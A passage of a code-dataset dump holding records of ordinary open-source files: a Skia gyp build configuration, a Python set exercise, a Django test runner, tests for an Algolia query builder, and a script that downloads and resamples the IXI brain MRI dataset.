'__ARM_HAVE_OPTIONAL_NEON_SUPPORT',
],
}],
],
},
],
}],
],
}
| 39.517361 | 103 | 0.549864 |
{
'targets': [
# else). However, to keep the .gyp file simple and avoid platform-specific
# build breakage, we do this on all platforms.
# For about the same reason, we need to compile the ARM opts files
# separately as well.
{
'target_name': 'skia_opts',
'type': 'static_library',
'includes': [
'skia_common.gypi',
],
'include_dirs': [
'../third_party/skia/include/core',
'../third_party/skia/include/effects',
'../third_party/skia/src/core',
'../third_party/skia/src/opts',
],
'conditions': [
[ 'os_posix == 1 and OS != "mac" and OS != "android" and \
target_arch != "arm" and target_arch != "arm64" and \
target_arch != "mipsel"', {
'cflags': [
'-msse2',
],
}],
[ 'target_arch != "arm" and target_arch != "mipsel" and \
target_arch != "arm64"', {
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkBlitRect_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkUtils_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkBitmapFilter_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_SSE2.cpp',
],
'dependencies': [
'skia_opts_ssse3',
],
}],
# TODO(rmcilroy): Add neon support for arm64 - http://crbug.com/354405
[ 'target_arch == "arm"', {
'conditions': [
[ 'arm_version >= 7 and arm_neon == 1', {
'defines': [
'__ARM_HAVE_NEON',
],
}],
[ 'arm_version >= 7 and arm_neon_optional == 1', {
'defines': [
'__ARM_HAVE_OPTIONAL_NEON_SUPPORT',
],
}],
[ 'arm_version >= 7 and (arm_neon == 1 or arm_neon_optional == 1)', {
'cflags': [
# The neon assembly contains conditional instructions which
# aren't enclosed in an IT block. The assembler complains
'-Wa,-mimplicit-it=always',
],
'dependencies': [
'skia_opts_neon',
]
}],
],
# -fno-omit-frame-pointer flag for Android, as that gets added to all
# targets via common.gypi.
'cflags!': [
'-fno-omit-frame-pointer',
'-marm',
'-mapcs-frame',
],
'cflags': [
'-fomit-frame-pointer',
],
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_arm.cpp',
],
}],
[ 'target_arch == "arm" and (arm_version < 7 or (arm_neon == 0 and arm_neon_optional == 1))', {
'sources': [
'../third_party/skia/src/opts/memset.arm.S',
],
}],
[ 'target_arch == "arm" and arm_version < 6', {
'sources': [
'../third_party/skia/src/opts/SkBlitMask_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_none.cpp',
'../third_party/skia/src/opts/SkUtils_opts_none.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_none.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_none.cpp',
],
}],
[ 'target_arch == "arm" and arm_version >= 6', {
'sources': [
'../third_party/skia/src/opts/SkBlitMask_opts_arm.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_arm.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_arm.h',
'../third_party/skia/src/opts/SkBlurImage_opts_arm.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_arm.cpp',
'../third_party/skia/src/opts/SkUtils_opts_arm.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
],
}],
[ 'target_arch == "mipsel"',{
'cflags': [
'-fomit-frame-pointer',
],
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitMask_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_none.cpp',
'../third_party/skia/src/opts/SkUtils_opts_none.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_none.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_none.cpp',
],
}],
[ 'target_arch == "arm64"',{
# TODO(rmcilroy): Update this once http://crrev.com/143423004/ lands.
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitMask_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_none.cpp',
'../third_party/skia/src/opts/SkUtils_opts_none.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_none.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_none.cpp',
],
}],
],
},
# For the same lame reasons as what is done for skia_opts, we have to
# create another target specifically for SSSE3 code as we would not want
# to compile the SSE2 code with -mssse3 which would potentially allow
# gcc to generate SSSE3 code.
{
'target_name': 'skia_opts_ssse3',
'type': 'static_library',
'includes': [
'skia_common.gypi',
],
'include_dirs': [
'../third_party/skia/include/core',
'../third_party/skia/include/effects',
'../third_party/skia/src/core',
],
'conditions': [
[ 'OS in ["linux", "freebsd", "openbsd", "solaris", "android"]', {
'cflags': [
'-mssse3',
],
}],
[ 'OS == "mac"', {
'xcode_settings': {
'GCC_ENABLE_SUPPLEMENTAL_SSE3_INSTRUCTIONS': 'YES',
},
}],
[ 'OS == "win"', {
'include_dirs': [
'config/win',
],
'direct_dependent_settings': {
'include_dirs': [
'config/win',
],
},
}],
[ 'target_arch != "arm" and target_arch != "arm64" and \
target_arch != "mipsel"', {
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_SSSE3.cpp',
],
}],
],
},
{
'target_name': 'skia_opts_none',
'type': 'static_library',
'includes': [
'skia_common.gypi',
],
'include_dirs': [
'../third_party/skia/include/core',
'../third_party/skia/include/effects',
'../third_party/skia/src/core',
],
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitMask_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_none.cpp',
'../third_party/skia/src/opts/SkUtils_opts_none.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_none.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_none.cpp',
],
},
],
'conditions': [
# NEON code must be compiled with -mfpu=neon which also affects scalar
# code. To support dynamic NEON code paths, we need to build all
# NEON-specific sources in a separate static library. The situation
# is very similar to the SSSE3 one.
['target_arch == "arm" and (arm_neon == 1 or arm_neon_optional == 1)', {
'targets': [
{
'target_name': 'skia_opts_neon',
'type': 'static_library',
'includes': [
'skia_common.gypi',
],
'include_dirs': [
'../third_party/skia/include/core',
'../third_party/skia/include/effects',
'../third_party/skia/src/core',
'../third_party/skia/src/opts',
],
'cflags!': [
'-fno-omit-frame-pointer',
'-mfpu=vfp', # remove them all, just in case.
'-mfpu=vfpv3',
'-mfpu=vfpv3-d16',
],
'cflags': [
'-mfpu=neon',
'-fomit-frame-pointer',
],
'ldflags': [
'-march=armv7-a',
'-Wl,--fix-cortex-a8',
],
'sources': [
'../third_party/skia/src/opts/memset16_neon.S',
'../third_party/skia/src/opts/memset32_neon.S',
'../third_party/skia/src/opts/SkBitmapProcState_arm_neon.cpp',
'../third_party/skia/src/opts/SkBitmapProcState_matrixProcs_neon.cpp',
'../third_party/skia/src/opts/SkBitmapProcState_matrix_clamp_neon.h',
'../third_party/skia/src/opts/SkBitmapProcState_matrix_repeat_neon.h',
'../third_party/skia/src/opts/SkBlitMask_opts_arm_neon.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_arm_neon.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_arm_neon.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_neon.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_neon.cpp',
],
'conditions': [
['arm_neon == 1', {
'defines': [
'__ARM_HAVE_NEON',
],
}],
['arm_neon_optional == 1', {
'defines': [
'__ARM_HAVE_OPTIONAL_NEON_SUPPORT',
],
}],
],
},
],
}],
],
}
| true | true |
f71907adad9d2ae1000384e3083a6e18b87ab471 | 98 | py | Python | Solution/90.py | pallavimr12/Python_Levelwise_Exercises | 4090437b537260be2eca06c8d52d3a2bba1f5a5e | [
"BSD-3-Clause"
] | 2 | 2020-10-23T10:55:58.000Z | 2020-11-24T04:26:23.000Z | Solution/90.py | pallavimr12/Python_Levelwise_Exercises | 4090437b537260be2eca06c8d52d3a2bba1f5a5e | [
"BSD-3-Clause"
] | null | null | null | Solution/90.py | pallavimr12/Python_Levelwise_Exercises | 4090437b537260be2eca06c8d52d3a2bba1f5a5e | [
"BSD-3-Clause"
] | 2 | 2020-11-19T06:37:29.000Z | 2022-01-18T14:36:46.000Z | set1=set([1,3,6,78,35,55])
set2=set([12,24,35,24,88,120,155])
set1 &= set2
li=list(set1)
print(li) | 19.6 | 34 | 0.653061 | set1=set([1,3,6,78,35,55])
set2=set([12,24,35,24,88,120,155])
set1 &= set2
li=list(set1)
print(li) | true | true |
f71908625209dd39e30f636c7b0dfff45f945d88 | 2,104 | py | Python | runtests.py | timgates42/django-spillway | f5700e21e545106005a99ba0804f7d6c88038553 | [
"BSD-3-Clause"
] | 62 | 2015-01-20T22:21:09.000Z | 2019-11-25T12:57:53.000Z | runtests.py | timgates42/django-spillway | f5700e21e545106005a99ba0804f7d6c88038553 | [
"BSD-3-Clause"
] | 24 | 2015-01-07T00:03:10.000Z | 2021-06-10T17:34:35.000Z | runtests.py | timgates42/django-spillway | f5700e21e545106005a99ba0804f7d6c88038553 | [
"BSD-3-Clause"
] | 19 | 2015-01-12T18:08:29.000Z | 2020-08-10T17:16:31.000Z | #!/usr/bin/env python
import os
import sys
import shutil
import tempfile
import traceback
from django.conf import settings
import django
# Scratch directory used for MEDIA_ROOT and the test database; removed by
# teardown() at the end of the run.
TMPDIR = tempfile.mkdtemp(prefix='spillway_')
# Minimal Django settings applied when no settings module is configured.
DEFAULT_SETTINGS = {
    'INSTALLED_APPS': (
        'django.contrib.staticfiles',
        'django.contrib.gis',
        'rest_framework',
        'spillway',
        'tests',
    ),
    'DATABASES': {
        'default': {
            'ENGINE': 'django.contrib.gis.db.backends.spatialite',
            'NAME': 'spillway.db',
            'TEST': {'NAME': os.path.join(TMPDIR, 'test.db')}
        }
    },
    'MEDIA_ROOT': TMPDIR,
    'MIDDLEWARE': (
        'django.middleware.common.CommonMiddleware',
        'django.middleware.csrf.CsrfViewMiddleware',
    ),
    'ROOT_URLCONF': 'tests.urls',
    'STATIC_URL': '/static/',
    'SPATIALITE_LIBRARY_PATH': 'mod_spatialite.so',
    'TEMPLATES': [{
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'APP_DIRS': True,
    }],
    'REST_FRAMEWORK': {
        # Fix for Django 1.9:
        # https://github.com/tomchristie/django-rest-framework/issues/3494
        'UNAUTHENTICATED_USER': None
    }
}
def teardown():
    """Best-effort removal of the temporary test directory.

    Failure to delete is reported but never raises, so it cannot mask the
    real test exit status.
    """
    try:
        shutil.rmtree(TMPDIR)
    except OSError as exc:
        # Include the OS error so leftover-file problems are diagnosable.
        print('Failed to remove {}: {}'.format(TMPDIR, exc))
def runtests():
    """Configure Django, run the 'tests' suite, then clean up and exit."""
    if not settings.configured:
        settings.configure(**DEFAULT_SETTINGS)
    django.setup()
    # Imported after django.setup() so the app registry is populated.
    from spillway.models import upload_to
    os.mkdir(os.path.join(TMPDIR, upload_to.path))
    parent = os.path.dirname(os.path.abspath(__file__))
    sys.path.insert(0, parent)
    try:
        from django.test.runner import DiscoverRunner
        runner_class = DiscoverRunner
    except ImportError:
        # Fallback for old Django versions without DiscoverRunner.
        from django.test.simple import DjangoTestSuiteRunner
        runner_class = DjangoTestSuiteRunner
    try:
        status = runner_class(
            verbosity=1, interactive=True, failfast=False).run_tests(['tests'])
    except Exception:
        traceback.print_exc()
        status = 1
    finally:
        # NOTE(review): if a non-Exception (e.g. KeyboardInterrupt) escapes
        # run_tests, ``status`` is unbound here and this raises NameError --
        # confirm whether that is acceptable.
        teardown()
        sys.exit(status)
if __name__ == '__main__':
runtests()
| 26.632911 | 79 | 0.626901 |
import os
import sys
import shutil
import tempfile
import traceback
from django.conf import settings
import django
TMPDIR = tempfile.mkdtemp(prefix='spillway_')
DEFAULT_SETTINGS = {
'INSTALLED_APPS': (
'django.contrib.staticfiles',
'django.contrib.gis',
'rest_framework',
'spillway',
'tests',
),
'DATABASES': {
'default': {
'ENGINE': 'django.contrib.gis.db.backends.spatialite',
'NAME': 'spillway.db',
'TEST': {'NAME': os.path.join(TMPDIR, 'test.db')}
}
},
'MEDIA_ROOT': TMPDIR,
'MIDDLEWARE': (
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
),
'ROOT_URLCONF': 'tests.urls',
'STATIC_URL': '/static/',
'SPATIALITE_LIBRARY_PATH': 'mod_spatialite.so',
'TEMPLATES': [{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
}],
'REST_FRAMEWORK': {
'UNAUTHENTICATED_USER': None
}
}
def teardown():
try:
shutil.rmtree(TMPDIR)
except OSError:
print('Failed to remove {}'.format(TMPDIR))
def runtests():
if not settings.configured:
settings.configure(**DEFAULT_SETTINGS)
django.setup()
from spillway.models import upload_to
os.mkdir(os.path.join(TMPDIR, upload_to.path))
parent = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, parent)
try:
from django.test.runner import DiscoverRunner
runner_class = DiscoverRunner
except ImportError:
from django.test.simple import DjangoTestSuiteRunner
runner_class = DjangoTestSuiteRunner
try:
status = runner_class(
verbosity=1, interactive=True, failfast=False).run_tests(['tests'])
except Exception:
traceback.print_exc()
status = 1
finally:
teardown()
sys.exit(status)
if __name__ == '__main__':
runtests()
| true | true |
f71908676eab5124d188403862efaa148addfb00 | 3,684 | py | Python | tests/test_filters.py | Ryanb58/algoliaqb | d92a29e46d3ab4fd84685835a2b858e3ba8aecbb | [
"MIT"
] | 4 | 2020-08-28T19:22:02.000Z | 2020-09-04T21:12:43.000Z | tests/test_filters.py | Ryanb58/algoliaqb | d92a29e46d3ab4fd84685835a2b858e3ba8aecbb | [
"MIT"
] | 3 | 2020-08-31T16:05:47.000Z | 2020-09-11T16:31:24.000Z | tests/test_filters.py | Ryanb58/algoliaqb | d92a29e46d3ab4fd84685835a2b858e3ba8aecbb | [
"MIT"
] | null | null | null | from algoliaqb import AlgoliaQueryBuilder
def test_normal_filters():
    """A plain string-mapped filter renders as ``field:value``."""
    builder = AlgoliaQueryBuilder(
        search_param="search",
        filter_map={"is_reported": "is_reported"},
    )
    request_args = {"is_reported": True}
    assert builder.get_filter_query(request_args) == "is_reported:True"
def test_object_filters():
    # Nested map entries are parenthesised and AND-ed with scalar clauses.
    builder = AlgoliaQueryBuilder(
        search_param="search",
        filter_map={
            "status_id": {
                "status_id": "statuses.status_id",
                "group_id": "statuses.group_id",
            },
            "is_reported": "is_reported",
        },
    )
    request_args = {
        "is_reported": True,
        "status_id": 21,
        "group_id": 4,
    }
    query = builder.get_filter_query(request_args)
    for fragment in ("is_reported:True",
                     "statuses.status_id:21",
                     "statuses.group_id:4"):
        assert fragment in query
    assert query == "(statuses.status_id:21 AND statuses.group_id:4) AND is_reported:True"
def test_date_filter():
    # Date-typed entries render as open-ended comparisons or TO ranges.
    builder = AlgoliaQueryBuilder(
        search_param="search",
        filter_map={
            "group_id": "group_id",
            "created_on": {
                "type": "date",
                "created_on_start": "created_on",
                "created_on_end": "created_on",
            },
        },
    )
    # Start bound only -> "greater than" comparison.
    query = builder.get_filter_query({
        "group_id": 4,
        "created_on_start": "1538697600",
    })
    assert "created_on > 1538697600" in query
    assert query == "group_id:4 AND created_on > 1538697600"
    # Both bounds -> inclusive TO range.
    query = builder.get_filter_query({
        "group_id": 4,
        "created_on_start": "1538697600",
        "created_on_end": "1539697800",
    })
    assert "created_on:1538697600 TO 1539697800" in query
    assert query == "group_id:4 AND created_on:1538697600 TO 1539697800"
    # End bound only -> "less than" comparison.
    query = builder.get_filter_query({
        "group_id": 4,
        "created_on_end": "1539697800",
    })
    assert "created_on < 1539697800" in query
    assert query == "group_id:4 AND created_on < 1539697800"
def test_not_using_normal_string_filters():
    # Request keys absent from the filter map (pagination, ordering)
    # must be ignored by the query builder.
    builder = AlgoliaQueryBuilder(
        search_param="search",
        filter_map={
            "group_id": "group_id",
            "status_id": {
                "group_id": "statuses.group_id",
                "status_id": "statuses.status_id",
            },
            "is_reported": "is_reported",
            "main_contact_account_id": "main_contact.account_id",
            "created_on": {
                "type": "date",
                "created_on_start": "created_on",
                "created_on_end": "created_on",
            },
            "updated_on": {
                "type": "date",
                "updated_on_start": "updated_on",
                "updated_on_end": "updated_on",
            },
            "referral_source_id": {
                "group_id": "referral_sources.group_id",
                "referral_source_id": "referral_sources.id",
            },
            "tag_id": {
                "group_id": "tags.group_id",
                "tag_id": "tags.id",
            },
        },
    )
    query = builder.get_filter_query({
        "page": 1,
        "order_by": "status_custom-position",
        "group_id": 4,
    })
    assert "group_id:4" in query
    assert query == "group_id:4"
| 26.695652 | 97 | 0.575461 | from algoliaqb import AlgoliaQueryBuilder
def test_normal_filters():
aqb = AlgoliaQueryBuilder(
search_param="search",
filter_map={
"is_reported": "is_reported"
}
)
flask_request_args = {
"is_reported": True
}
filter_query = aqb.get_filter_query(flask_request_args)
assert filter_query == "is_reported:True"
def test_object_filters():
aqb = AlgoliaQueryBuilder(
search_param="search",
filter_map={
"status_id": {
"status_id": "statuses.status_id",
"group_id": "statuses.group_id"
},
"is_reported": "is_reported"
}
)
flask_request_args = {
"is_reported": True,
"status_id": 21,
"group_id": 4
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "is_reported:True" in filter_query
assert "statuses.status_id:21" in filter_query
assert "statuses.group_id:4" in filter_query
assert filter_query == "(statuses.status_id:21 AND statuses.group_id:4) AND is_reported:True"
def test_date_filter():
aqb = AlgoliaQueryBuilder(
search_param="search",
filter_map={
"group_id":"group_id",
"created_on": {
"type": "date",
"created_on_start": "created_on",
"created_on_end": "created_on"
}
}
)
flask_request_args = {
"group_id": 4,
"created_on_start": "1538697600",
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "created_on > 1538697600" in filter_query
assert filter_query == "group_id:4 AND created_on > 1538697600"
flask_request_args = {
"group_id": 4,
"created_on_start": "1538697600",
"created_on_end": "1539697800",
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "created_on:1538697600 TO 1539697800" in filter_query
assert filter_query == "group_id:4 AND created_on:1538697600 TO 1539697800"
flask_request_args = {
"group_id": 4,
"created_on_end": "1539697800",
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "created_on < 1539697800" in filter_query
assert filter_query == "group_id:4 AND created_on < 1539697800"
def test_not_using_normal_string_filters():
aqb = AlgoliaQueryBuilder(
search_param="search",
filter_map={
"group_id": "group_id",
"status_id": {
"group_id": "statuses.group_id",
"status_id": "statuses.status_id",
},
"is_reported": "is_reported",
"main_contact_account_id": "main_contact.account_id",
"created_on": {
"type": "date",
"created_on_start": "created_on",
"created_on_end": "created_on",
},
"updated_on": {
"type": "date",
"updated_on_start": "updated_on",
"updated_on_end": "updated_on",
},
"referral_source_id": {
"group_id": "referral_sources.group_id",
"referral_source_id": "referral_sources.id",
},
"tag_id": {
"group_id": "tags.group_id",
"tag_id": "tags.id",
}
}
)
flask_request_args = {
"page": 1,
"order_by": "status_custom-position",
"group_id": 4,
}
filter_query = aqb.get_filter_query(flask_request_args)
assert "group_id:4" in filter_query
assert filter_query == "group_id:4"
| true | true |
f7190a9265422f741faef15c4be15a7052a9510b | 7,314 | py | Python | data/IXI_HH/download_IXI_HH.py | sambuddinc/DLTK | 9511b0b9860118a9285c2fe730ea49dfe247cab6 | [
"Apache-2.0"
] | null | null | null | data/IXI_HH/download_IXI_HH.py | sambuddinc/DLTK | 9511b0b9860118a9285c2fe730ea49dfe247cab6 | [
"Apache-2.0"
] | null | null | null | data/IXI_HH/download_IXI_HH.py | sambuddinc/DLTK | 9511b0b9860118a9285c2fe730ea49dfe247cab6 | [
"Apache-2.0"
] | 1 | 2021-04-29T03:01:53.000Z | 2021-04-29T03:01:53.000Z | # -*- coding: utf-8 -*-
"""Download and extract the IXI Hammersmith Hospital 3T dataset
url: http://brain-development.org/ixi-dataset/
ref: IXI – Information eXtraction from Images (EPSRC GR/S21533/02)
"""
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from future.standard_library import install_aliases # py 2/3 compatability
install_aliases()
from urllib.request import FancyURLopener
import os.path
import tarfile
import pandas as pd
import glob
import SimpleITK as sitk
import numpy as np
# Pipeline stage toggles: set individual flags to False to skip a stage
# (useful when re-running after a partial failure).
DOWNLOAD_IMAGES = True
EXTRACT_IMAGES = True
PROCESS_OTHER = True
RESAMPLE_IMAGES = True
CLEAN_UP = True
def resample_image(itk_image, out_spacing=(1.0, 1.0, 1.0), is_label=False):
    """Resample a 3D SimpleITK image onto a grid with voxel spacing
    *out_spacing*, preserving origin, direction and physical extent.

    Label maps use nearest-neighbour interpolation (so label values are
    never blended); intensity images use B-spline interpolation.
    """
    in_spacing = itk_image.GetSpacing()
    in_size = itk_image.GetSize()
    # Scale each dimension by the spacing ratio so the field of view
    # stays the same.
    out_size = [
        int(np.round(in_size[axis] * (in_spacing[axis] / out_spacing[axis])))
        for axis in range(3)
    ]
    resampler = sitk.ResampleImageFilter()
    resampler.SetOutputSpacing(out_spacing)
    resampler.SetSize(out_size)
    resampler.SetOutputDirection(itk_image.GetDirection())
    resampler.SetOutputOrigin(itk_image.GetOrigin())
    resampler.SetTransform(sitk.Transform())
    resampler.SetDefaultPixelValue(itk_image.GetPixelIDValue())
    if is_label:
        resampler.SetInterpolator(sitk.sitkNearestNeighbor)
    else:
        resampler.SetInterpolator(sitk.sitkBSpline)
    return resampler.Execute(itk_image)
def reslice_image(itk_image, itk_ref, is_label=False):
    """Resample *itk_image* onto the grid (size/spacing/origin/direction)
    of the reference image *itk_ref*. Nearest-neighbour for label maps,
    B-spline for intensity images."""
    resampler = sitk.ResampleImageFilter()
    resampler.SetReferenceImage(itk_ref)
    interpolator = sitk.sitkNearestNeighbor if is_label else sitk.sitkBSpline
    resampler.SetInterpolator(interpolator)
    return resampler.Execute(itk_image)
# Source archives for each IXI modality plus the demographic spreadsheet.
urls = {}
urls['t1'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI-T1.tar'
urls['t2'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI-T2.tar'
urls['pd'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI-PD.tar'
urls['mra'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI-MRA.tar'
urls['demographic'] = 'http://biomedic.doc.ic.ac.uk/brain-development/downloads/IXI/IXI.xls'
# Local filenames the downloads are saved under (keys mirror `urls`).
fnames = {}
fnames['t1'] = 't1.tar'
fnames['t2'] = 't2.tar'
fnames['pd'] = 'pd.tar'
fnames['mra'] = 'mra.tar'
fnames['demographic'] = 'demographic.xls'
if DOWNLOAD_IMAGES:
    # Download all IXI data; existing local files are not re-fetched,
    # so interrupted runs can simply be restarted.
    for key, url in urls.items():
        if not os.path.isfile(fnames[key]):
            print('Downloading {} from {}'.format(fnames[key], url))
            curr_file = FancyURLopener()
            curr_file.retrieve(url, fnames[key])
        else:
            print('File {} already exists. Skipping download.'.format(
                fnames[key]))
if EXTRACT_IMAGES:
    # Extract the HH (Hammersmith Hospital) subset of IXI: only archive
    # members whose name contains '-HH-' are unpacked, into ./orig/<modality>.
    for key, fname in fnames.items():
        if (fname.endswith('.tar')):
            print('Extracting IXI HH data from {}.'.format(fnames[key]))
            output_dir = os.path.join('./orig/', key)
            if not os.path.exists(output_dir):
                os.makedirs(output_dir)
            t = tarfile.open(fname, 'r')
            for member in t.getmembers():
                if '-HH-' in member.name:
                    t.extract(member, output_dir)
if PROCESS_OTHER:
    # Process the demographic xls data and save to csv, keeping only
    # subjects for which all four modalities were extracted.
    xls = pd.ExcelFile('demographic.xls')
    print(xls.sheet_names)
    df = xls.parse('Table')
    for index, row in df.iterrows():
        # Normalise the numeric subject id into the 'IXInnn' filename prefix.
        IXI_id = 'IXI{:03d}'.format(row['IXI_ID'])
        df.loc[index, 'IXI_ID'] = IXI_id
        t1_exists = len(glob.glob('./orig/t1/{}*.nii.gz'.format(IXI_id)))
        t2_exists = len(glob.glob('./orig/t2/{}*.nii.gz'.format(IXI_id)))
        pd_exists = len(glob.glob('./orig/pd/{}*.nii.gz'.format(IXI_id)))
        mra_exists = len(glob.glob('./orig/mra/{}*.nii.gz'.format(IXI_id)))
        # Check if each entry is complete and drop if not
        # if not t1_exists and not t2_exists and not pd_exists and not mra
        # exists:
        if not (t1_exists and t2_exists and pd_exists and mra_exists):
            df.drop(index, inplace=True)
    # Write to csv file
    df.to_csv('demographic_HH.csv', index=False)
if RESAMPLE_IMAGES:
    # Resample the IXI HH T2 images to 1mm/2mm isotropic grids and
    # reslice the other modalities onto them.
    # BUGFIX: `.as_matrix()` was removed in pandas 1.0 -> use `.values`.
    df = pd.read_csv('demographic_HH.csv', dtype=object, keep_default_na=False,
                     na_values=[]).values
    for row in df:
        IXI_id = row[0]
        print('Resampling {}'.format(IXI_id))
        t1_fn = glob.glob('./orig/t1/{}*.nii.gz'.format(IXI_id))[0]
        t2_fn = glob.glob('./orig/t2/{}*.nii.gz'.format(IXI_id))[0]
        pd_fn = glob.glob('./orig/pd/{}*.nii.gz'.format(IXI_id))[0]
        mra_fn = glob.glob('./orig/mra/{}*.nii.gz'.format(IXI_id))[0]
        t1 = sitk.ReadImage(t1_fn)
        t2 = sitk.ReadImage(t2_fn)
        # Renamed from `pd` so the pandas module is no longer shadowed.
        pd_img = sitk.ReadImage(pd_fn)
        mra = sitk.ReadImage(mra_fn)
        # Resample to 1mm isotropic resolution (T2 defines the grid).
        t2_1mm = resample_image(t2)
        t1_1mm = reslice_image(t1, t2_1mm)
        pd_1mm = reslice_image(pd_img, t2_1mm)
        mra_1mm = reslice_image(mra, t2_1mm)
        output_dir = os.path.join('./1mm/', IXI_id)
        if not os.path.exists(output_dir):
            os.makedirs(output_dir)
        print('T1: {} {}'.format(t1_1mm.GetSize(), t1_1mm.GetSpacing()))
        print('T2: {} {}'.format(t2_1mm.GetSize(), t2_1mm.GetSpacing()))
        print('PD: {} {}'.format(pd_1mm.GetSize(), pd_1mm.GetSpacing()))
        print('MRA: {} {}'.format(mra_1mm.GetSize(), mra_1mm.GetSpacing()))
        sitk.WriteImage(t1_1mm, os.path.join(output_dir, 'T1_1mm.nii.gz'))
        sitk.WriteImage(t2_1mm, os.path.join(output_dir, 'T2_1mm.nii.gz'))
        sitk.WriteImage(pd_1mm, os.path.join(output_dir, 'PD_1mm.nii.gz'))
        sitk.WriteImage(mra_1mm, os.path.join(output_dir, 'MRA_1mm.nii.gz'))
        # Resample to 2mm isotropic resolution
        t2_2mm = resample_image(t2, out_spacing=[2.0, 2.0, 2.0])
        t1_2mm = reslice_image(t1, t2_2mm)
        pd_2mm = reslice_image(pd_img, t2_2mm)
        mra_2mm = reslice_image(mra, t2_2mm)
        output_dir = os.path.join('./2mm/', IXI_id)
        if not os.path.exists(output_dir):
            os.makedirs(output_dir)
        # BUGFIX: the original printed t2_2mm's size on the T1 line.
        print('T1: {} {}'.format(t1_2mm.GetSize(), t1_2mm.GetSpacing()))
        print('T2: {} {}'.format(t2_2mm.GetSize(), t2_2mm.GetSpacing()))
        print('PD: {} {}'.format(pd_2mm.GetSize(), pd_2mm.GetSpacing()))
        print('MRA: {} {}'.format(mra_2mm.GetSize(), mra_2mm.GetSpacing()))
        sitk.WriteImage(t1_2mm, os.path.join(output_dir, 'T1_2mm.nii.gz'))
        sitk.WriteImage(t2_2mm, os.path.join(output_dir, 'T2_2mm.nii.gz'))
        sitk.WriteImage(pd_2mm, os.path.join(output_dir, 'PD_2mm.nii.gz'))
        sitk.WriteImage(mra_2mm, os.path.join(output_dir, 'MRA_2mm.nii.gz'))
if CLEAN_UP:
    import shutil
    # Remove the downloaded .tar archives.
    for key, fname in fnames.items():
        if (fname.endswith('.tar')):
            os.remove(fname)
    # Remove all data in original resolution. Portable replacement for
    # `os.system('rm -rf orig')`; ignore_errors mirrors `rm -f` semantics.
    shutil.rmtree('orig', ignore_errors=True)
| 35.852941 | 92 | 0.649439 |
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from future.standard_library import install_aliases
install_aliases()
from urllib.request import FancyURLopener
import os.path
import tarfile
import pandas as pd
import glob
import SimpleITK as sitk
import numpy as np
DOWNLOAD_IMAGES = True
EXTRACT_IMAGES = True
PROCESS_OTHER = True
RESAMPLE_IMAGES = True
CLEAN_UP = True
def resample_image(itk_image, out_spacing=(1.0, 1.0, 1.0), is_label=False):
original_spacing = itk_image.GetSpacing()
original_size = itk_image.GetSize()
out_size = [int(np.round(original_size[0]*(original_spacing[0]/out_spacing[0]))),
int(np.round(original_size[1]*(original_spacing[1]/out_spacing[1]))),
int(np.round(original_size[2]*(original_spacing[2]/out_spacing[2])))]
resample = sitk.ResampleImageFilter()
resample.SetOutputSpacing(out_spacing)
resample.SetSize(out_size)
resample.SetOutputDirection(itk_image.GetDirection())
resample.SetOutputOrigin(itk_image.GetOrigin())
resample.SetTransform(sitk.Transform())
resample.SetDefaultPixelValue(itk_image.GetPixelIDValue())
if is_label:
resample.SetInterpolator(sitk.sitkNearestNeighbor)
else:
resample.SetInterpolator(sitk.sitkBSpline)
return resample.Execute(itk_image)
def reslice_image(itk_image, itk_ref, is_label=False):
resample = sitk.ResampleImageFilter()
resample.SetReferenceImage(itk_ref)
